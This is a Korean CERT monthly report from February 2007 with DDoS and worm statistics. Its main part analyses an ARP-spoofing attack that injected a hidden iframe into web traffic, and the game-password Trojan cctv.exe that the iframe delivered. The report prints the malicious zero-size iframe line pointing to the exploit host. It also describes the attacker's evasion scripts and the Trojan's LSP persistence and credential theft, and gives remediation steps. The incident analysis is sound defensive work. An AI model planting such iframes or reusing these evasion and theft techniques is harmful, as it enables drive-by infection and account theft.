02/10 22:00 02/11 09:00 02/11 20:00 02/12 17:00 02/12 18:00 02/13 05:00 02/13 16:00 02/14 03:00 02/14 14:00 02/15 01:00 02/15 12:00 02/15 23:00 02/16 10:00 02/16 21:00 02/17 08:00 02/17 19:00 02/18 06:00 02/18 17:00 02/19 04:00 02/19 15:00 02/20 02:00 02/20 13:00 02/21 00:00 02/21 11:00 02/21 22:00 02/22 09:00 02/22 20:00 02/23 07:00 02/23 18:00 02/24 05:00 시간 이번 달 국내 ISP의 일부구간에서 수집된 공격유형을 분석한 결과 TCP SYN Flooding, UDP Flooding, TCPACK Flooding 과 같은 DDoS 공격 트래픽이 가장 많이 탐지되었다. 시도건수 4,000,000 3,600,000 3,200,000 2,800,000 2,400,000 2,000,000 1,600,000 1,200,000 800,000 400,000 ISP업계 : 공격 추이 TCP SYN Flooding(DDo... UDP Flooding TCP ACK Flooding 0 07/02/01 07/02/02 07/02/03 07/02/04 07/02/05 07/02/06 07/02/07 07/02/08 07/02/09 07/02/10 07/02/11 07/02/12 07/02/13 07/02/14 07/02/15 07/02/16 07/02/17 07/02/18 07/02/19 07/02/20 07/02/21 07/02/22 07/02/23 07/02/24 (그림 19) 국내 인터넷망에 유입된 공격유형 시간 18 2007년 2월호

www.krcert.or.kr 2-4. 바이러스 월 탐지 웜 바이러스 정보 KISA 및 2개 기관/업체의 바이러스 월을 통하여 수집된 웜 바이러스를 파악한 결과 전월과 동일 하게 웹 사이트 등을 통하여 1차 감염된 후 웜 바이러스, 트로이잔 등 악성코드 본체를 추가로 다운로드 받는 Downloader가 가장 많았던 것으로 파악되었으며, Downloader가 전월대비 53% 감소하는 등 전체적으로 수집된 숫자가 감소하였다. [표 15] 수집된 주요 웜 바이러스 현황 순위 1 2 3 4 5 6 7 8 9 10 합계 2007 1 2 3 4 5 6 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 DOWN DOWN LOADER 197,235 LOADER 92,238 NOTIFIER 142,634 HLLW 36,260 PWS LINEAGE HLLW MULDROP HLLM PARITE CLICK STARTER 기타 71,417 66,175 MULDROP 58,001 51,208 CASHPACK 30,129 30,117 26,618 25,084 445,205 1,143,823 PWS LINEAGE PROXY CLICK HLLM PARITE 기타 30,491 28,394 24,774 22,942 17,439 16,949 16,363 15,304 237,532 538,686 인터넷 침해사고 동향 및 분석 월보 19

월간 특집 Part 1 Part 2 Part 3 월간특집 1. ARP Spoofing 기법을 이용한 웹 페이지 악성코드 삽입 사례 1. 개요 인터넷 침해사고 중 전통적인 웹 변조 행위는, 사이트 초기페이지를 공격자가 원하는 메시지로 바꾸어, 실력을 과시하거나 정치적인 의미를 전달하고자 하였다. 하지만 최근 대부분의 경우에서는 눈에 띄지 않도록 악성코드를 숨겨두어 방문자의 컴퓨터에 악성프로그램을 설치하고 구동시키는 양상으로 발전하고 있다. 이 러한 악성 코드의 전파를 통해, 웹 변조 침해사고의 범위를 일반 사용자들의 PC까지 확대시킨 대표적인 이 유는, PC 사용자의 계정 정보 또는 개인정보를 탈취하거나 수집하여 악용함으로써, 금전적인 이익을 얻기 위 함이다. 그러므로 원하는 정보의 수집을 극대화하기 위해서 악성코드들의 수명을 장기간 지속시키고, 많은 수의 PC에 침투해야 하기 때문에 더욱더 정교한 방법으로 이루어지고 있다. 따라서 웹 변조사고에 대해 관리 자들이 탐지하거나 조치하기가 더욱 어려워지고 있는 실정이다. 지금까지 발견된 악성코드 삽입의 대표적인 대상으로는 웹사이트 소스파일, 접속자 측 스크립트(자바 스크 립트, 비주얼베이직 스크립트 등), CSS 또는.inc등의 참조파일, 플래시파일의 액션스크립트, 데이터베이스 자료 값 등이 있다. 하지만 이러한 경우는 대부분 웹 서버 내부의 침해사고이므로, 원인분석이나 보완 조치 등이 해당 서버 내에서만 이루어 졌었지만, 본 사고의 경우에는 네트워크상의 트래픽을 탈취/변조하여 악성 iframe 코드를 삽입하였으므로, 지금까지의 악성코드삽입 사례들과는 다른 특징을 지니고 있으며, 다음과 같이 요약할 수 있다. 대상 웹서버에 침투하지 않고, 동일한 서브네트워크의 취약 시스템 악용 동일한 서브네트워크에서 동적 ARP cache를 운용중인 모든 서버의 트래픽 변조 가능 ARP Spoofing 기법을 수동적인 스니핑에서 그치지 않고 트래픽 변조에 악용 악성코드 삽입 관련 침해사고 분석 시 서버단위에서 네트워크 단위로 분석 범위의 확장 필요 즉, (그림 1)과 같이 ARP Spoofing 기법을 통해 공격자의 서버가 게이트웨이인 것으로 위장하여 외부로 나가는 트래픽을 가로채고 변조하였기 때문에, 피해 시스템뿐만 아니라 네트워크 환경에서의 이상유무도 함 께 확인해야 한다. 20 2007년 2월호

www.krcert.or.kr Internet 악성프로그램 유포서버 http://dreamxxx.com (FreeBSD) G/W 210.XX.129 (Cisco) Client 정상페이지 소스 Web Server 210.X.X.139 (LINUX) Attacker 210.X.X.222 (Win.2000) 게이트웨이와 Web서버에 자신의 MAC과 위장 IP로 ARP 패킷을 전송하여, 서버와 Client간의 트래픽을 가로채고 변조하여 전달! (그림 1) 침해사고 개요도 최종 분석 결과 ARP Spoofing을 수행했던 서버는 같은 서브네트워크의 윈도우즈 2000 서버였으며, 이 서버 또한 공격자가 침투한 후에 ARP Spoofing 프로그램을 설치하여 동작시킨 피해서버 중의 하나였다. 이러한 침해사고 분석 결과에 따라, 웹 서버의 ARP cache에서 게이트웨이 MAC주소를 정적(permanent) 으로 설정하고, 윈도우즈 시스템에서 ARP Spoofing 프로그램을 종료시키고 나서야, 그동안 웹 페이지에 삽입되었던 악성코드가 사라지게 되었다. 그리고 악성프로그램을 유포한 사이트의 분석결과, 1,000여개의 다른 웹사이트를 해킹한 후 유포지 서버로 자동 접속하도록 악용하였으며, 62만 여개의 Unique IP가 악성프로그램 다운로드 페이지를 방문하고, 이 중 보안 취약점이 있는 9만 2천여 대의 PC가 감염된 대규모 악성코드 유포 사례였다. 이에 따라, 인터넷 침해사고대응지원센터에서는 발견된 1,000여개의 경유지 사이트의 목록을 확보하여 담당자에게 해당 사실 을 통보하고 보완 조치하도록 하였다. 인터넷 침해사고 동향 및 분석 월보 21

Part 1 Part 2 Part 3 월간특집 2. 악성코드 경유지 웹사이트 분석 분석 대상 서버는 휴대전화 게임관련 사이트였으며 운용환경은 다음과 같다. 네트워크 환경 : 부산 모 통신 社 의 IDC 서버호스팅 시스템 용도 : 웹 서버 운영체제 : LINUX (CentOS 3.6) -웹 서버 : Apache 1.3.34, PHP 4.4.1 -기타 서비스 : MySQL 그리고 이 서버에 인터넷 브라우저로 접속하게 되면, (그림 2)와 같이 모든 HTML페이지에 악성 프로그램 설치를 유도하는 iframe 코드가 아래와 같이 삽입되어 있었다. (그림 2) 접속자 브라우저에서 수신한 웹 페이지 이 외에도, 피해 서버에서 나타나던 이상 증상은 다음과 같았다. HTML페이지가 시작되는 부분인 <title>태그 부근에 iframe 삽입 HTTP 또는 SSH연결의 접속 지연 및 접속 장애 OS재설치를 위해 새로운 OS와 물리적으로 다른 서버로 이전하였음에도 동일하게 발생 악성코드가 삽입되는 현상이 지속되지 않고 일시적으로 발생 분석 초기에는 침해사고 분석절차에 따라 각종 로그 분석과 시스템 분석을 장기간 진행하였으나 원인을 찾지 못하였다. 시스템 분석 결과 원인을 찾지 못했기 때문에, 네트워크 트래픽을 관찰하였으며, 해당 서버에서 발송되는 트래픽과 웹 접속자의 브라우저에서의 내용이 상이함을 발견하였다. 아래의 (그림 3)은 웹 서버에서 접속자에게 보내는 tcpdump결과이며, 전송되는 내용에는 악성코드가 없는 상태이지만, 접속자에게는 (그림 4)와 같이 iframe을 이용한 악성코드가 삽입된 채로 수신되었다. 22 2007년 2월호

www.krcert.or.kr (그림 3) 웹 서버에서 접속자에게 전송한 HTML 코드 (그림 4) 접속자에게 수신된 HTML 코드 그러므로 웹서버와 접속자간의 통신구간에서 문제가 있을 것으로 추정하고, ARP Spoofing 여부를 확인 하였다. 해당 서버가 입주해 있는 IDC측에 문의한 결과 웹서버 ARP cache 상의 게이트웨이 MAC과 실제 게이트웨이 MAC이 다른 것을 확인하였으며, 게이트웨이로 위장하고 트래픽을 변조하고 있는 서버를 찾아서 추가 분석을 진행하였다. 인터넷 침해사고 동향 및 분석 월보 23

Part 1 Part 2 Part 3 월간특집 3. 트래픽 변조 서버 분석 웹서버와 게이트웨이에 위장 ARP패킷을 보내어 트래픽을 변조한 서버의 운용환경은 다음과 같다. 운용환경 : 부산 모 통신 社 의 IDC 서버호스팅 시스템 용도 : 웹 호스팅 및 테스트 서버 운영체제 : WINDOWS 2000 Server Std. (SP4) -웹 서버 : IIS 5.0 -기타 서비스 : MS-SQL 2000 이 서버는 웹서버와 동일한 서브네트워크 안에서 웹호스팅 서버로 쓰이면서, 홈페이지 개발 테스트용으로도 쓰이고 있었다. 시스템 분석을 위해 동작하고 있는 프로세스들을 살펴보았으나, ARP Spoofing과 관련된 프로세스는 발견하지 못했는데, 나중에 밝혀진 결과 공격자가 스크립트를 이용하여 관리자의 로그인을 탐지 하여 해당 프로세스를 중지시켰기 때문이었다. 침해사고 분석을 위해 공격자의 파일을 확보하고자 웹 취약점이 있는지 확인하였으며, 취약한 웹 사이트의 디렉토리를 점검한 결과 공격자가 생성해 둔 파일들을 찾을 수 있었다. 웹 사이트의 침해사고를 분석하기 위해 웹로그를 찾아 보았으나, 서버의 HDD 용량문제 때문에 로그를 남기지 않도록 운영해 왔기 때문에 웹로그 분석은 할 수 없었다. (그림 5) IIS 웹로그 설정화면 가. ARP Spoofing 관련 프로그램 분석 웹 디렉토리에 남겨진 파일은 server.asp 파일이었으며, ARP Spoofing을 구동시키는 역할을 하는 파일 이었다. 그리고 ARP Spoofing에 필요한 파일들은 c:\winnt\addins\ 디렉토리에서 발견 할 수 있었으며, 각 파일들의 역할을 분석해 보면 다음과 같다. 24 2007년 2월호

www.krcert.or.kr C:\webhome\board\server.asp : 외부에서 HTTP를 이용하여 ARP Spoofing 프로그램을 구동 시키기 위한 스크립트 파일을 실행 (그림 6) server.asp C:\winnt\addins\a.vbs : ARP Spoofing을 수행하는 프로그램(ppppt.exe)에 인자값들을 전달하여 실행 (그림 7) a.vbs C:\winnt\addins\a.bat : a.vbs와 동일한 역할을 수행하지만 배치파일 형태로 동작하고, ppppt.exe 프로세스를 강제로 중지(kill)시키게 되면 ping 명령으로 약 20여 분간 지연시킨 후 다시 ppppt.exe 실행시키기 때문에, 관리자가 프로세스를 계속해서 모니터링 하지 않으면 ppppt.exe 프 로세스의 재시작을 알기 어려움 (그림 8) a.bat C:\winnt\addins\go.bat : 관리자 그룹의 계정이 로그인 하게 되면 로그오프하면서 ppppt.exe 프로세스 종료 (그림 9) go.bat C:\winnt\addins\job.txt : ARP spoofing하는 동안 수신되는 트래픽 중에서 지정한 형식의 패킷이 수신 되면 job.txt파일의 문자열 규칙에 따라 대체하여 변조하기 위한 참조파일이며 2행은 검색 조건이고 4열은 대체할 문자열이므로, 트래픽중에 <title 이라는 문자열이 검색되면 iframe코드를 삽입함 (그림 10) job.txt 인터넷 침해사고 동향 및 분석 월보 25

Part 1 Part 2 Part 3 월간특집 나. ARP Spoofing관련 프로그램 분석 실제로 이 서버에서 ARP Spoofing을 수행한 프로그램 파일명은 ppppt.exe이며, UPX로 실행 압축된 상태 였다. 실행압축 해제 후 (그림 11)과 같이 바이너리를 분석한 결과 ARP spoofing용으로 제작된 공개 소스 를 이용한 것으로 확인되었다. (그림 11) ppppt.exe파일의 strings 본 분석에서의 네트워크 환경은 개요에서 설명한 (그림 1)과 같이 게이트웨이 IP는 210.X.X.129, 웹서버 IP는 210.X.X.139, 트래픽 변조 서버 IP는 210.X.X.222이다. 참고로, Windows XP에서는 raw socket을 통한 트래픽에 제한을 받기 때문에 패킷 변조에 제약이 있다. 위장 ARP 전송 단계 ARP Spoofing 프로그램을 실행하면, (그림 12)와 같이 출력되면서 트래픽 변조를 위한 모니터링을 시작 한다. (그림 12) ppppt.exe 프로그램 실행 그리고 (그림 13)을 보면 알 수 있듯이, 게이트웨이와 웹 서버 양쪽에 MAC과 IP주소를 위장하는 ARP 패킷 을 보내면, 동적인 ARP cache를 사용하는 시스템에서는 수신된 ARP 패킷의 정보를 받아들여 (그림 14)와 같이 ARP cache를 갱신하게 되며, 트래픽 변조 서버는 웹 서버의 ARP cache를 유지시키기 위해 지속적 으로 ARP 패킷을 보낸다. 26 2007년 2월호

www.krcert.or.kr (그림 13) 변조서버에서 위장 ARP 전송 위장된 ARP패킷을 수신한 웹 서버에서는 아래의 그림과 같이 ARP cache를 갱신하게 되어 실제의 게이트웨이로 보내야 할 트래픽을 변조 서버로 보내게 된다. 트래픽 변조 단계 (그림 14) 위장 ARP 수신 후 변경된 ARP cache 위장 ARP를 전송한 후 인입되는 트래픽을 관찰하여, 지정한 형식의 패킷이면, 아래 (그림 15)의 job.txt 파일을 참조하여 지정한 문자열로 대체(replace)하여 전송 한다. (그림 15) 문자열 대체 규칙 정의 파일 인터넷 침해사고 동향 및 분석 월보 27

Part 1 Part 2 Part 3 월간특집 아래의 (그림 16)을 살펴보면 웹 서버에서 전송한 패킷에는 iframe이 없지만, (그림 17)과 같이 변조 서버 에서 변조한 후 (그림 18)과 같이 전송하게 되면 접속자에게는 (그림 19)와 같이 변조된 페이지가 수신된다. (그림 16) 웹서버에서 접속자에게 전송되는 트래픽을 변조서버가 수신 (그림 17) 변조서버에서 트래픽 변조 (그림 18) 변조한 내용으로 변조서버가 웹 접속자에게 전송 (그림 19) 웹 접속자의 브라우저로 수신된 변조 페이지 지금까지의 과정을 거친 후, 브라우저에서는 iframe에 정의되어 있는 페이지에 접속을 시도하게 된다. 28 2007년 2월호

www.krcert.or.kr 4. 악성코드 유포지 웹사이트 분석 본 장에서는 악성코드 유포지로 사용된 서버의 분석 결과를 살펴보도록 한다. 악성코드 유포지로 사용된 서버는 FreeBSD 상에서 Apache 웹서버(버전 1.3.34)를 사용하고 있었다. 악성코드 은닉 사고의 상당수가 중국발 공격이었는데, 이번 유포지 서버 역시 중국으로 부터의 침입흔적이 발견되었다. 한 가지 특이한 것은 지금까지의 악성코드 유포지/경유지 사이트들은 대부분 윈도우즈 OS와 IIS 웹서버를 주 공격 대상으로 하였는데, 본 사례의 경우 FreeBSD OS와 Apache 웹서버를 공격하였다는 것이다. 다음 그림은 악성프로그램 유포사고의 대략적인 시나리오이다. 1. 경유지 및 유포지 사이트 해킹 악성코드 경유지 웹사이트(1,000여개) <iframe src=http://dreamxxx.com/img/jang/music.htm height=0 width=0></iframe> 해외 공격자 6. 한게임/메이플스토리 게임정보 유출 2. 경유지 웹 사이트 방문 3. 유포지 사이트로 자동 접속 5. 미패치 PC 감염(9만2천여대) 4. PC 감염 시도(62만여대) 인터넷 사용자 악성코드 유포지 웹사이트 (http://dreamxxx.com) (그림 20) 악성코드 유포 시나리오 가. 악성코드 경유지 사이트에서 유포 사이트로 접속 유도 아래와 같이 다수의 악성코드 경유지 사이트에 본 사고분석을 진행한 악성코드 유포 사이트로 접속하도록 iframe을 은닉하였다. <iframe src=http://dreamxxx.com/img/jang/music.htm height=0 width=0></iframe> 일반사용자가 경유지 사이트를 방문할 경우 위의 은닉된 부분으로 인해 자동으로 dreamxxx.com 사이트로 접속되고 PC의 보안취약점(MS06-014)을 공격하는 music.htm에 의해 보안 패치가 되어 있지 않은 PC에 cctv.exe 라는 파일이 실행되어 한게임 및 메이플스토리 온라인게임 ID와 패스워드를 유출시키는 트로이 목마를 설치한다. 인터넷 침해사고 동향 및 분석 월보 29

Part 1 Part 2 Part 3 월간특집 나. 피해 규모 1,000여 개의 경유지 웹사이트 발견 해당 유포 사이트에서는 웹로그에 referer 를 남기도록 설정되어 있었다. referer는 해당 페이지를 요청한 이전 URL을 의미하는 것으로 일반적으로 어떤 경로를 통해 자사의 웹사이트를 방문했는지 확인하기 위한 목적으로 남기는 경우가 많다. 즉, 자사 사이트가 어떤 검색 서비스를 통해 접속했는지 확인하여 사이트 홍보에 활용하기 위한 용도로 많이 사용된다. 본 사고의 유포지 사이트에서는 아래와 같이 referer를 같이 남기도록 설정되어 있어 이를 통한 경유지 사이트를 찾는데 많은 도움이 되었다. LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\"\"%{User-Agent}i\""combined LogFormat "%h %l %u %t \"%r\" %>s %b" common LogFormat "%{Referer}i %U" referer LogFormat "%{User-agent}i" agent 다음은 웹 로그파일에 남은 music.htm 파일 접속 로그의 한 예인데, http://xxx.xxx.com 사이트를 통해 xxx.xxx.144.182인 IP 주소를 가진 사용자가 music.htm 파일에 대한 접속 요청을 한 것을볼수있다. xxx.xxx.144.182 - - [19/Dec/2006:17:07:33 +0900] "GET /img/jang/music.htm HTTP/1.1 " 200 2115 "http://xxx.xxx.com/""mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4322;.NET CLR 2.0.50727)" 일반적인 경우, 인터넷 사용자가 공격자가 만들어 놓은 music.htm 파일의 경로를 정확히 알고 주소창에 직 접 입력하는 경우는 드물 것이다. 따라서, 이 경우 인터넷 사용자가 경유지 사이트를 방문했는데 경유지 사이 트에 숨겨진 iframe으로 인해 자동으로 공격자가 만들어 놓은 music.htm에 접속하였다고 추측할 수 있다. music.htm 파일을 요청한 웹사이트는 총 1,000여 개였으며, 이들은 악성코드 경유지 사이트로 악용되고 있는 사이트들로 추정된다. 이들 중 상당수는 게임관련 사이트들이었으며, 분석 당시에도 이들 사이트 중 일부에서 악의적인 iframe이 숨겨져 있는 것을 확인할 수 있었다. 약 62만여대 PC 중 9만 2천여대 PC 감염 추정 악성프로그램을 PC에 설치하는 공격 코드인 music.htm 파일에 대한 접속시도는 총 11,806,862회 있었다. # grep music.htm xxx.xxx.com-access.log wc -l 11806862 이 중 실제 접속이 정상적으로 이루어진 것(HTTP 상태코드 200)은 625,505개의 Unique IP로부터의 접속이었다. 관리자에 의해 music.htm이 수시로 삭제되어 나머지는 파일이 존재하지 않는다는 오류 메시지 (HTTP 상태코드 404)가 나타났다. 62만여 대의 컴퓨터 중 보안 패치가 되지 않은 PC가 악성프로그램을 다운로드 받은 기록이 남겨져 있었으며, 그 수는 약 9만 2천여대로 확인되었다. 30 2007년 2월호

www.krcert.or.kr 5. 결론 및 대책 본 사고의 분석 결과 가장 큰 특징으로는, 웹 변조와 관련된 침해 사고가 더 이상 서버 내부에서만의 문제가 아니라는 점이다. 그러므로 아무리 웹 사이트보안을 철저히 관리해도 네트워크상에서의 웹 변조를 방지하기 는 어렵기 때문에, 네트워크상에서의 보안도 함께 고려해야 한다. 또한, 서버 담당자뿐만 아니라 네트워크 담당자, ISP 또는 IDC운용자, 호스팅사업자 등의 제반 환경에 연관된 담당자들의 협조도 반드시 필요하다. 본 사고는 웹 서버나 프로그램의 취약점이 아니라, ARP 프로토콜 표준의 악용으로 인한 것이므로, 취약점 패치나 조치가 필요하지는 않으며, 운용환경의 설정을 강화하는 것으로 보완할 수 있다. ARP spoofing에 대응할 수 있는 대책으로는, 네트워크 관리자가 게이트웨이에서 정적 ARP Table을 관리 하고, 스위칭 장비에서 각 포트별 정적인 MAC 설정 및 서버에서도 정적인 ARP cache로 운용하는 것이 바람직하다. 현실적으로는 지켜지기 어렵지만, NIC 또는 서버나 라우터의 교체가 빈번하지 않은 IDC환경 에서는 충분히 관리할 수 있을 것이다. 그리고 만약 특정 호스트로부터 지속적인 ARP 패킷이 수신된다면 비정상적인 호스트일 가능성이 높으므로 주의해야 한다. ARP cache를 감독하기 위한 도구도 있는데, 예를 들면 arpwatch라는 프로그램은 ARP cache를 모니터링하여 변경되는 경우에는 관리자에게 알린다. 최종적으로 악성코드 삽입으로 인한 피해를 줄이기 위해서는, PC의 올바른 관리와 서버들의 보안수준 강화 로 사고를 예방하고, 악성프로그램의 중계지 뿐만 아니라 악성프로그램의 유포지에 대해서도 적극적인 재발 방지 노력을 기울여야 한다. 이러한 웹 변조 침해사고가 재발되는 대부분의 경우는 악성코드만을 삭제하거나 악성프로그램 파일을 삭제하는 것으로 조치를 끝내는 경우가 많기 때문인데, 원인 분석을 통해 침해사고의 경로를 파악하고 취약점을 보완하지 않으면 계속해서 재발되는 사고를 막기는 사실상 불가능하다. 그러므로 침해사고가 발생하면 분석절차 가이드 등과 같은 문서를 참조하여, 철저한 원인분석과 보완작업 등의 사후 조치가 반드시 필요하다. 인터넷 침해사고 동향 및 분석 월보 31

Part 1 Part 2 Part 3 월간특집 2. Trojan (cctv.exe) 위험성 분석 1. 개요 웹 사이트에 악성코드가 은닉되는 방식으로 Trojan에 감염되는 피해가 많이 발생하고 있다. 최근에는 이러한 웹 사이트 은닉기법과 함께 은닉서버를 추적하기 어렵도록 ARP Spoofing 기법을 동시에 이용한 사고사례가 보고되었다. 공격자는 원인파악 및 대응조치를 보다 어렵게 하고자 이러한 기법을 이용한 것으로 보인다. 악성코드 은닉을 통한 감염유형이 ARP Spoofing 기법과 함께 악용된 사례는 이번에 최초로 보고되었지만 이러한 방식의 악성코드 유포가 다른 사이트들에서도 다수 발생하고 있을 가능성이 있어 주의 할 필요가 있다. 공격자는 Trojan 전파를 위하여 MDAC 취약점을(MS06-014) 이용하였다. 사용자가 취약한 웹 브라우저를 사용할 경우 웹 서핑 중에 사용자 모르게 Trojan에 감염될 수 있으며, 감염 시에는 특정 게임사이트의 계정 입력 정보가 유출된다. 사용자는 이러한 악성코드 감염피해를 사전 예방하기 위하여 인터넷 사용 전에 반드시 OS를 최신으로 패치하여야 한다. 2. 전파 기법 및 감염 절차 전파에 이용되는 취약점 -MDAC 취약점 (MS06-014) 유포지 사이트에서 발견된 music.htm의 내용을 살펴본 결과, 악성코드 유포를 위한 공격코드가 삽입되어 있었다. 전파에 이용된 취약점은 MDAC 취약점 (MS06-014)인 것으로 확인되었다. 유포지 music.htm 파일 내용 예 32 2007년 2월호

www.krcert.or.kr music.htm의 디코딩 결과 디코딩 하면 아래와 같은 MS06-014 공격코드 스크립트를 확인할 수 있다. Trojan 감염 절차 분석 사용자의 Internet Explorer취약점 공격이 성공하면 cctv.exe 파일이 악성 사이트로부터 다운로드되며 실행된다. cctv.exe는 백도어 기능을 수행하는 okviewer4.dll 파일을 생성하며, 이 파일을 LSP(Layered Service Provider)로 등록한다. LSP란 winsock2 호출을 가로채어 조작 및 기타 기능을 수행할 수 있는 컴포넌트를 의미한다. 여기에서는 정보 유출을 위한 악의적인 목적으로 이용된다. IE 취약점 공격 cctv.exe 생성 및 실행 okviewer4.dll 생성 및 LSP 등록 alg.exe 생성 및 서비스 등록 - 악성코드 설치 과정 상세 1 Internet Explorer의 취약점 공격이 성공하면, 악성 사이트로 부터 악성코드 cctv.exe 가 다운로드 되어 실행된다. 2 cctv.exe 는 윈도우폴더에 alg.exe 파일과 시스템 폴더에 okviewer4.dll 파일을 생성한다. 윈도우 폴더 WinNT,2000 c:\winnt WinXP c:\windows 인터넷 침해사고 동향 및 분석 월보 33

Part 1 Part 2 Part 3 월간특집 윈도우 시스템 폴더 WinNT,2000 c:\winnt\system32 WnXP c:\windows\system32 3 cctv.exe 는 okviewer4.dll 를 LSP로 등록한다. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters \Protocol_Catalog9\Catalog_Entries의 PackedCatalogItem에 okviewer4.dll 등록 < okviewer4.dll LSP 등록 예> 4 cctv.exe 는 okviewer4.dll 를 IEXPLORER.EXE 및 기타 몇몇 프로세스에 Injection 시킨다. <IE 프로세스에 okviewer4.dll 가 인젝션 된 예> 34 2007년 2월호

www.krcert.or.kr 5 alg.exe는 부팅 시에도 계속적으로 메모리에 로드되기 위하여 아래와 같이 서비스에 등록된다. 서비스이름 : PCIDown 표시이름 : PCIAdapter 실행파일경로 : 윈도우 폴더 \alg.exe 인터넷 침해사고 동향 및 분석 월보 35

Part 1 Part 2 Part 3 월간특집 3. 악성 기능 분석 백도어 기능 구현 원리 네트워크 응용 프로그램 (lexplorer, FTP etc) Winsock2 LSP Base Protocol (TCP/IP, IPX/SPX, etc.) Winsock2 환경에서는 Winsock2와 기본 프로토콜 (TCP/IP, IPX/SPX) 사이에 특정 기능을 수행하는 컴포넌트를 삽입할 수 있는데 이 삽입 컴포넌트를 LSP라고 한다. Winsock2는 이러한 LSP 기능 구현을 위한 인터페이스를 제공해 주고 있다. LSP를 통하여 기본 프로 토콜 (TCP/IP, IPX 등) 바로 위 계층에서 통신 내용 감시, 차단 등 기타 행위를 할 수 있다. 이번 Trojan의 경우 백도어 기능구현을 위하여 LSP 와 IE 인젝션 기법을 이용하였다. 감염 시 okviewer4.dll 파일이 LSP 로 등록되며, 공격자는 이 코드를 통하여 정보를 유출한다. 백도어 기능 분석 cctv.exe 는 특정 게임 사이트의 ID와 Password 정보를 유출하기 위한 Trojan 이다. 감염 후 사용자가 특정 게임 사이트에 접속하여 게임 계정정보를 입력할 경우 해당 정보 (ID, Password)는 공격자에게로 유출되게 된다. 감염시유출정보 감염되면 Trojan은 hangame 및 maplestory 게임 사이트 접속여부를 체크한다. 사용자가 해당 사이트에 접속하여 게임을 실행하면, Trojan 은 접속 ID와 Password, 접속 게임 PVP 서버정보를 공격자에게로 유출시킨다. <정보유출 내용> hangame 게임 상의 ID, Password를 유출 maplestory 게임 상의 ID, Password를 유출 접속 대상 게임서버 호스트 명, 사용자 컴퓨터 이름 유출 <공격자에게로의 정보 전송 > Trojan은 공격자가 구성한 아래의 사이트로 정보를 전송함. 도메인 : www.x[생략]x.com 포트 : TCP 80 36 2007년 2월호

www.krcert.or.kr 정보유출과정상세 감염 시 공격자에게 게임정보를 유출하기 위하여 okviewer4.dll 코드 내에 아래와 같은 루틴이 구현되어 있다. hangame 접속 및 r2 게임의 프로그램 실행여부를 확인하여 해당 웹사이트 및 게임 프로그램 상 에서 입력되는 ID와 Password를 유출시킨다. 사용자 PC명 및 접속되어 있는 게임 서버명 정보도 함께 유출 시킨다. 한 게임 및 maplestory 사이트 접속여부 확인 한 게임 프로그램인 R2Client.exe 실행여부 확인 maplestory 게임 프로그램 실행여부 확인 인터넷 침해사고 동향 및 분석 월보 37

Part 1 Part 2 Part 3 월간특집 gethostname Function을 통하여 감염 PC의 이름을 확인한다. 접속된 게임서버 IP, 서버번호를 확인한다. 사용자 입력 ID와 Password, 사용자 PC명, 접속된 게임서버 정보를 공격자 사이트 www.x[생 략]X.com (TCP80 port)로 유출시킨다. 해당 서버에서는 recvmail.asp 파일이 전송된 정보를 받 아 처리한다. 분석 시간대에는 recvmail.asp에 대한 접속이 불가능한 것으로 관찰되었다. <hangame 계정정보 유출 예> <maplestory 계정정보 유출 예> 38 2007년 2월호

www.krcert.or.kr 4. 피해 현황 및 위험 요소 cctv.exe 악성코드를 유포시키는 은닉사이트 웹 서버에 이미 매우 많은 사용자들이 접속한 것으로 확인되고 있어 국내 다수의 PC가 감염되었을 것으로 보인다. hangame 및 maplestory 게임 이용자들은 패스워드를 주기적으로 바꾸어 계정이 도용되는 것을 예방 하도록한다. 5. 감염 시 치료 방법 <감염 시 치료 절차 요약> 1 안전모드로 부팅 2 악성코드 alg.exe 삭제 3 악성코드에 의하여 손상된 Winsock 복구 4 악성코드 okviewer4.dll 삭제 재 부팅 <절차별 상세> 1 안전모드로 부팅 윈도우를 다시 시작하여 안전 모드로 부팅한다. (부팅시 F8을 누른 후 안전모드 선택) 2 악성코드 alg.exe 삭제 Trojan이 윈도우 폴더에 생성한 alg.exe를 삭제한후재부팅한다. 윈도우 폴더 WinNT,2000 c:\winnt WnXP c:\windows 인터넷 침해사고 동향 및 분석 월보 39

Part 1 Part 2 Part 3 월간특집 3 악성코드에 의하여 손상된 Winsock 복구 윈도우 XP SP2 일경우의 Winsock 복구방법 Step 2. netsh winsock reset 명령을 입력 Step 3. 재 부팅 윈도우 XP SP1 일 경우의 Winsock 복구방법 Step 1. 시작 실행 regedit 를 입력 후 확인 레지스트리 편집기에서 아래 경로의 키를 찾아 마우스 오른쪽 버튼을 눌러 삭제 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2 40 2007년 2월호

www.krcert.or.kr Step 2. TCP/IP 설치 시작 제어판 네트워크 및 인터넷 연결 네트워크 연결 로컬영역 연결(마우스 오른쪽 버튼 클릭하여 속성 선택) 설치 클릭 프로토콜 선택 후 추가 디스크 있음 c:\windows\inf 를 입력한 다음 확인 을클릭 Step 3. 인터넷 프로토콜(TCP/IP) 선택 후 확인 클릭 Step 4. 재 부팅 윈도우 2000일 경우의 Winsock 복구방법 Step 1. 시작 설정 제어판 네트워크 및 전화접속 로컬영역 연결(마우스 오른쪽 버튼 클릭하여 등록정보 선택) 인터넷프로토콜 (TCP/IP) 선택한 후 제거 메뉴 클릭 Step 2. 재 부팅 인터넷 침해사고 동향 및 분석 월보 41

